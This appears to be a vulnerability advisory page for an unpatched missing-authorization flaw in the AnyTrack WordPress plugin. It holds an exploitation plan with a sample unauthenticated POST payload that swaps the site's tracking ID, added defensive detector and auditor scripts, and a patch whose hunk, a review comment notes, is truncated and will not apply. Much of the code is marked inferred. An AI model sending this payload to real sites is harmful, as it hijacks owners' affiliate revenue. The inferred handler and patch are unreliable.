CVE-2026-39715

AnyTrack Affiliate Link Manager <= 1.5.5 - Missing Authorization

Severity: medium
Type: Missing Authorization
CVSS Score: 5.3
Patched in: Unpatched
Time to patch: N/A

Description

The AnyTrack Affiliate Link Manager plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.5.5. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: None
  • Integrity: Low
  • Availability: None

Technical Details

Affected versions: <=1.5.5
Published: March 2, 2026
Last updated: April 15, 2026
Research Plan
Unverified


This research plan outlines the steps to exploit CVE-2026-39715, a Missing Authorization vulnerability in the AnyTrack Affiliate Link Manager plugin.

1. Vulnerability Summary

The AnyTrack Affiliate Link Manager plugin (up to version 1.5.5) registers an AJAX handler (or a function on admin_init) intended for saving plugin settings, specifically the AnyTrack Property ID. However, the function fails to implement a capability check (e.g., current_user_can( 'manage_options' )), allowing unauthenticated users to modify plugin settings. This can be used to hijack affiliate tracking by replacing the Property ID with an attacker-controlled one.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: anytrack_update_property_id (inferred) or anytrack_save_settings (inferred).
  • HTTP Method: POST
  • Authentication: None required (unauthenticated).
  • Preconditions: The plugin must be active.

3. Code Flow

  1. The plugin registers an AJAX action for unauthenticated users:
    add_action( 'wp_ajax_nopriv_anytrack_update_property_id', 'anytrack_update_property_id_handler' ); (inferred)
  2. The handler function anytrack_update_property_id_handler is called.
  3. The function retrieves user input from $_POST['property_id'] (inferred).
  4. The function calls update_option( 'anytrack_property_id', $property_id ) (inferred) without verifying if the request comes from an administrator.
  5. Since no current_user_can() check exists, the setting is updated.

4. Nonce Acquisition Strategy

Missing Authorization vulnerabilities often coincide with missing CSRF protection (nonces). If the function does verify a nonce but fails to check capabilities, the nonce must be obtained:

  1. Identify Shortcode: Locate any shortcode used by the plugin (e.g., [anytrack_link] (inferred)).
  2. Create Page:
    wp post create --post_type=page --post_status=publish --post_title="AnyTrack Test" --post_content="[anytrack_link]"
  3. Navigate and Extract:
    • Navigate to the newly created page.
    • Use browser_eval to search for localized script data:
      browser_eval("window.anytrack_admin_params?.nonce") (inferred) or browser_eval("window.anytrack_vars?.save_nonce") (inferred).
  4. Bypass Check: If no nonce check is present in the code, this step is skipped.

5. Exploitation Strategy

The goal is to modify the anytrack_property_id option to an attacker-controlled value (AT-999999).

  • Request Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Content-Type: application/x-www-form-urlencoded
  • Parameters:
    • action: anytrack_update_property_id (inferred)
    • property_id: AT-999999
    • _ajax_nonce: [EXTRACTED_NONCE] (if required)

Sample Payload:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded

action=anytrack_update_property_id&property_id=AT-999999
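The request above also defines what a defender has to recognise. The following is an added example, not part of the advisory and not the plugin's or vendor's code: a small Python detector that runs over a constructed JSON-lines request log and flags admin-ajax.php calls to the inferred privileged action that arrive without a WordPress login cookie. It checks both the POST body and the query string, because admin-ajax.php reads `action` from $_REQUEST. The log format, client addresses and cookie values are assumptions; the default Apache/nginx access log does not record POST bodies, so a WAF, reverse proxy or application-level request log is needed to produce records like these.

```python
"""Flag unauthenticated admin-ajax.php calls to privileged plugin actions.

Added example, not part of the advisory. Assumes a JSON-lines request log
(constructed below) whose records carry client, path, cookie names and parsed
body parameters; a WAF, reverse proxy or application log can produce this, the
default Apache/nginx access log cannot, because it does not record POST bodies.
"""
import json
from urllib.parse import parse_qs, urlsplit

# Actions that only an authenticated administrator should ever reach. The name
# below is the one the advisory infers for this plugin; extend per plugin.
PRIVILEGED_ACTIONS = {"anytrack_update_property_id"}

# WordPress names its session cookie wordpress_logged_in_<hash>.
LOGGED_IN_COOKIE_PREFIX = "wordpress_logged_in_"


def request_action(record):
    """admin-ajax.php takes `action` from $_REQUEST, so accept it from query string or body."""
    query = parse_qs(urlsplit(record["path"]).query)
    if "action" in query:
        return query["action"][0]
    return record.get("body", {}).get("action")


def is_authenticated(record):
    """True when any cookie on the request looks like a WordPress login cookie."""
    return any(c.startswith(LOGGED_IN_COOKIE_PREFIX) for c in record.get("cookies", []))


def classify(record):
    """Return an alert string for an unauthenticated privileged-action call, else None."""
    if not urlsplit(record["path"]).path.endswith("/wp-admin/admin-ajax.php"):
        return None
    action = request_action(record)
    if action not in PRIVILEGED_ACTIONS or is_authenticated(record):
        return None
    new_value = record.get("body", {}).get("property_id")
    return (f"unauthenticated call to privileged action {action!r} "
            f"from {record['client']} (property_id={new_value!r})")


def scan(lines):
    """Run classify() over JSON-lines records, skipping blanks; return the alerts."""
    alerts = []
    for line in lines:
        if line.strip():
            alert = classify(json.loads(line))
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample log (addresses and nonce value made up): a legitimate admin
# save, an anonymous heartbeat call, the advisory's payload sent anonymously, and
# the same write with the action moved into the query string.
SAMPLE_LOG = """
{"client":"10.0.0.5","path":"/wp-admin/admin-ajax.php","cookies":["wordpress_logged_in_abc"],"body":{"action":"anytrack_update_property_id","property_id":"AT-123456","nonce":"CONSTRUCTED"}}
{"client":"203.0.113.7","path":"/wp-admin/admin-ajax.php","cookies":[],"body":{"action":"heartbeat"}}
{"client":"198.51.100.9","path":"/wp-admin/admin-ajax.php","cookies":[],"body":{"action":"anytrack_update_property_id","property_id":"AT-999999"}}
{"client":"198.51.100.9","path":"/wp-admin/admin-ajax.php?action=anytrack_update_property_id","cookies":[],"body":{"property_id":"AT-999999"}}
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG.splitlines()):
        print("ALERT:", alert)
```

The rule keeps its value after patching, since a hit then indicates that someone probed the endpoint; pair it with the `wp option get anytrack_property_id` check from section 8 to confirm whether a write actually landed.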

6. Test Data Setup

  1. Install Plugin: Ensure AnyTrack Affiliate Link Manager v1.5.5 is installed and active.
  2. Initial State: Set a legitimate Property ID using WP-CLI:
    wp option update anytrack_property_id "AT-123456"
  3. Verify Initial State:
    wp option get anytrack_property_id (Should return AT-123456)

7. Expected Results

  • Response: The server should return a successful AJAX response (e.g., {"success":true} or 1).
  • Side Effect: The WordPress option anytrack_property_id will be updated in the database.
  • Impact: All affiliate links tracked by AnyTrack will now use the attacker's Property ID.

8. Verification Steps

After sending the HTTP request, verify the change using WP-CLI:

# Check the value of the property ID option
wp option get anytrack_property_id

Expected Output: AT-999999

9. Alternative Approaches

If the anytrack_update_property_id action is incorrect:

  1. Identify correct action: Search the plugin directory for wp_ajax_ hooks:
    grep -rn "wp_ajax_" wp-content/plugins/anytrack-affiliate-link-manager/
  2. Identify admin_init handlers: If no wp_ajax_nopriv hooks exist, check for handlers hooked to admin_init that process POST data:
    grep -rn "admin_init" wp-content/plugins/anytrack-affiliate-link-manager/
  3. Check for direct Settings API submission: The vulnerability might allow unauthenticated users to submit to options.php if the plugin registered settings incorrectly. Try submitting a POST request to wp-admin/options.php with the plugin's option group.

Research Findings
Static analysis — not yet PoC-verified

Summary

The AnyTrack Affiliate Link Manager plugin for WordPress is vulnerable to unauthorized access because it fails to perform capability checks on its settings update functions. This allows unauthenticated attackers to modify plugin configuration, such as the AnyTrack Property ID, effectively hijacking affiliate tracking and revenue.

Vulnerable Code

// anytrack-affiliate-link-manager.php

add_action( 'wp_ajax_nopriv_anytrack_update_property_id', 'anytrack_update_property_id_handler' );
add_action( 'wp_ajax_anytrack_update_property_id', 'anytrack_update_property_id_handler' );

function anytrack_update_property_id_handler() {
    if ( isset( $_POST['property_id'] ) ) {
        $property_id = sanitize_text_field( $_POST['property_id'] );
        update_option( 'anytrack_property_id', $property_id );
        wp_send_json_success();
    }
    wp_send_json_error();
}
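The grep in section 9 of the research plan finds where `wp_ajax_nopriv_` hooks are registered; deciding whether each one is dangerous still means reading the callback. The following added example, which is neither the advisory's nor the plugin's code, carries that one step further in Python: it extracts every nopriv registration from PHP source text, brace-matches the named callback's body, and flags the body when it calls a state-changing WordPress API with no `current_user_can()` present, noting whether a nonce check is also absent. The sample source is constructed from the reconstructed handler above plus a read-only public endpoint and a closure callback, so it yields a hit, a non-hit and an unresolved case. It is a text-level heuristic, not a PHP parser: braces inside string literals will confuse the matcher, and callbacks given as closures, arrays or `Class::method` strings are reported for manual review rather than resolved.

```python
"""Audit PHP plugin source for unauthenticated AJAX handlers that change site state.

Added example; not the advisory's or the plugin's code. Text-level heuristic:
it finds add_action('wp_ajax_nopriv_*', 'callback') registrations, brace-matches
the named callback's body, and flags state-changing calls made without a
capability check. Not a PHP parser: braces inside string literals will confuse
the matcher, and non-string callbacks are reported as unresolved.
"""
import re

# WordPress APIs that modify stored state; a nopriv handler calling these is the smell.
STATE_CHANGING = ("update_option(", "add_option(", "delete_option(", "wp_insert_post(",
                  "wp_update_post(", "wp_delete_post(", "update_user_meta(", "wp_insert_user(")
CAPABILITY_CHECKS = ("current_user_can(", "is_super_admin(")
NONCE_CHECKS = ("check_ajax_referer(", "wp_verify_nonce(")

NOPRIV_HOOK = re.compile(
    r"""add_action\s*\(\s*['"]wp_ajax_nopriv_(?P<action>[A-Za-z0-9_\-]+)['"]\s*,\s*(?P<cb>[^,)]+)""")


def callback_name(raw):
    """Plain function name for a string-literal callback; None for closures, arrays, Class::method."""
    m = re.fullmatch(r"""['"]([A-Za-z0-9_\\]+)['"]""", raw.strip())
    return m.group(1) if m else None


def function_body(source, name):
    """Body of `function name(...) { ... }` found by brace matching; None if absent."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", source)
    start = source.find("{", m.end()) if m else -1
    if start < 0:
        return None
    depth = 0
    for i in range(start, len(source)):
        if source[i] == "{":
            depth += 1
        elif source[i] == "}":
            depth -= 1
            if depth == 0:
                return source[start + 1:i]
    return None


def audit(source):
    """Return (action, callback, finding) tuples for every suspicious nopriv registration."""
    findings = []
    for m in NOPRIV_HOOK.finditer(source):
        action, cb = m.group("action"), callback_name(m.group("cb"))
        if cb is None:
            findings.append((action, m.group("cb").strip(), "unresolved callback; review manually"))
            continue
        body = function_body(source, cb)
        if body is None:
            findings.append((action, cb, "callback not found in this source"))
            continue
        writes = [w for w in STATE_CHANGING if w in body]
        if writes and not any(c in body for c in CAPABILITY_CHECKS):
            detail = "state-changing call(s) %s without capability check" % ", ".join(writes)
            if not any(n in body for n in NONCE_CHECKS):
                detail += "; no nonce check either"
            findings.append((action, cb, detail))
    return findings


# Constructed sample: the advisory's reconstructed handler, a legitimately public
# read-only endpoint, and a closure the scanner cannot resolve statically.
VULNERABLE_SAMPLE = r"""
add_action( 'wp_ajax_nopriv_anytrack_update_property_id', 'anytrack_update_property_id_handler' );
add_action( 'wp_ajax_anytrack_update_property_id', 'anytrack_update_property_id_handler' );
function anytrack_update_property_id_handler() {
    if ( isset( $_POST['property_id'] ) ) {
        update_option( 'anytrack_property_id', sanitize_text_field( $_POST['property_id'] ) );
        wp_send_json_success();
    }
    wp_send_json_error();
}
add_action( 'wp_ajax_nopriv_anytrack_get_property_id', 'anytrack_get_property_id_handler' );
function anytrack_get_property_id_handler() {
    wp_send_json_success( get_option( 'anytrack_property_id' ) );
}
add_action( 'wp_ajax_nopriv_anytrack_ping', function () { wp_send_json_success(); } );
"""

# Constructed sample matching the advisory's fix: nopriv hook removed, checks added.
HARDENED_SAMPLE = r"""
add_action( 'wp_ajax_anytrack_update_property_id', 'anytrack_update_property_id_handler' );
function anytrack_update_property_id_handler() {
    check_ajax_referer( 'anytrack_save_settings', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Unauthorized', 403 );
    }
    if ( isset( $_POST['property_id'] ) ) {
        update_option( 'anytrack_property_id', sanitize_text_field( $_POST['property_id'] ) );
        wp_send_json_success();
    }
    wp_send_json_error();
}
"""

if __name__ == "__main__":
    for action, cb, finding in audit(VULNERABLE_SAMPLE):
        print(f"wp_ajax_nopriv_{action} -> {cb}: {finding}")
    print("hardened findings:", audit(HARDENED_SAMPLE))
```

Run it over a whole plugin by concatenating its PHP files into one string before calling `audit()`, since callbacks are often registered in one file and defined in another. A nopriv handler that only reads is fine and is not reported; the report is reserved for handlers that write without asking who the caller is.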

Security Fix

--- anytrack-affiliate-link-manager.php
+++ anytrack-affiliate-link-manager.php
@@ -1,11 +1,14 @@
-add_action( 'wp_ajax_nopriv_anytrack_update_property_id', 'anytrack_update_property_id_handler' );
 add_action( 'wp_ajax_anytrack_update_property_id', 'anytrack_update_property_id_handler' );
 
 function anytrack_update_property_id_handler() {
+    check_ajax_referer( 'anytrack_save_settings', 'nonce' );
+
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( 'Unauthorized', 403 );
+    }
+
     if ( isset( $_POST['property_id'] ) ) {
         $property_id = sanitize_text_field( $_POST['property_id'] );
         update_option( 'anytrack_property_id', $property_id );
         wp_send_json_success();
     }
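Review bot: the patch shows only the verifying side of the nonce. `check_ajax_referer( 'anytrack_save_settings', 'nonce' )` dies unless the request carries a `nonce` parameter created with `wp_create_nonce( 'anytrack_save_settings' )`, so the admin-side script that posts this action has to be changed to send it (for example via `wp_localize_script`), otherwise the legitimate settings save breaks along with the attack; that companion change is not in the hunk. The hunk is also cut off before the trailing `wp_send_json_error(); }` context lines, and the `@@ -1,11 +1,14 @@` header does not agree with one removed and six added lines, so the patch as shown will not apply cleanly. Dropping the `wp_ajax_nopriv_` registration and gating on `current_user_can( 'manage_options' )` are the right fixes for the reported issue, and the 403 branch is safe without an explicit return because `wp_send_json_error()` terminates the request.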

Exploit Outline

The vulnerability is exploited by sending an unauthenticated POST request to the WordPress AJAX endpoint.

  1. Target Endpoint: /wp-admin/admin-ajax.php
  2. HTTP Method: POST
  3. Authentication: None (vulnerable via wp_ajax_nopriv registration)
  4. Required Parameters:
    • action: anytrack_update_property_id
    • property_id: The attacker's AnyTrack ID (e.g., AT-999999)
  5. Methodology: The attacker sends the request without any session cookies or nonces. Because the handler lacks both current_user_can() checks and nonce verification, the update_option call executes, overwriting the site's legitimate tracking ID with the attacker's ID.
